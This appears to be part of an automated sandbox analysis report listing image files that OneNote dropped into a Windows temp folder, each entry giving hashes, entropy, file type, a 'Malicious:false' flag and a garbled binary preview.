                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{30C057CA-E502-44FD-A0B7-5AD6BFB017B8}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):79656
                                                                                                                                                                                                                  Entropy (8bit):7.966459570826366
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
                                                                                                                                                                                                                  MD5:39FF3ACAE544EAC172B1269F825B9E9F
                                                                                                                                                                                                                  SHA1:2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
                                                                                                                                                                                                                  SHA-256:70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
                                                                                                                                                                                                                  SHA-512:3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\.*.N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........|..4.wJ*..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{30E87821-4B64-4B08-8A8A-F31A4450103E}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{316D2570-BD3D-4019-AB3C-65704D74E2C0}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{3331EAF2-11CF-4C29-A051-2FFDC7C887C0}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3555
                                                                                                                                                                                                                  Entropy (8bit):7.686253071499049
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
                                                                                                                                                                                                                  MD5:8A5444524F467A45A5A10245F89C855A
                                                                                                                                                                                                                  SHA1:ACE68D567B02B68275E0345C86DB1139C0EC1386
                                                                                                                                                                                                                  SHA-256:7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
                                                                                                                                                                                                                  SHA-512:8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn*..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..|3.........................*Q..../c.....f.}8....D..|k..Z......0..~..c..e..m(...|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{3399FC93-FF6A-49AD-A60E-27692DC1631B}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 176 x 513, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11043
                                                                                                                                                                                                                  Entropy (8bit):7.96811228801767
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
                                                                                                                                                                                                                  MD5:8E9AB9C28B155A66BC5C0DA5E2A4EFB5
                                                                                                                                                                                                                  SHA1:972E61F162D48F1CEE21963ECBB2FE439105DB55
                                                                                                                                                                                                                  SHA-256:B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
                                                                                                                                                                                                                  SHA-512:12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.|.L.|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....|.)

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{34DCD8AA-A5EC-44F3-95F7-C30C4B3EED3A}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{369B2634-2FC8-4105-95F2-439DF8E8E575}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{38AD74DD-DBD4-4983-865B-CC82CD505853}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3009
                                                                                                                                                                                                                  Entropy (8bit):7.493528353751471
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
                                                                                                                                                                                                                  MD5:D9BD80D40B458EDB2A318F639561579A
                                                                                                                                                                                                                  SHA1:83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
                                                                                                                                                                                                                  SHA-256:509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
                                                                                                                                                                                                                  SHA-512:C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .t*e..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N....*..........#..M<|.2.Y.../QO.x.cTM4......+.F;V.x.de*....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{3950818A-DE12-433D-ADEF-60DC6D155919}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):784
                                                                                                                                                                                                                  Entropy (8bit):6.962539208465222
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
                                                                                                                                                                                                                  MD5:14105A831FE32590E52C2E2E41879624
                                                                                                                                                                                                                  SHA1:078FA63FC7DB5830E9059DF02D56882240429D90
                                                                                                                                                                                                                  SHA-256:D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
                                                                                                                                                                                                                  SHA-512:8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..*ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`.*..C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%|.f.~.......:y....S....UKovh...W'........lF... .................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{3B65BB4C-B36A-4406-8609-ABAF67B6B722}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 39 x 579, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):515
                                                                                                                                                                                                                  Entropy (8bit):6.740133870626016
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
                                                                                                                                                                                                                  MD5:E96BE30D892A5412CF262FEE652921CA
                                                                                                                                                                                                                  SHA1:8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
                                                                                                                                                                                                                  SHA-256:0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
                                                                                                                                                                                                                  SHA-512:D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{3B6D2615-2DE9-469F-9E0F-4959C202139D}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{3BD6766D-CFEB-499A-8BCD-557F95822B09}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
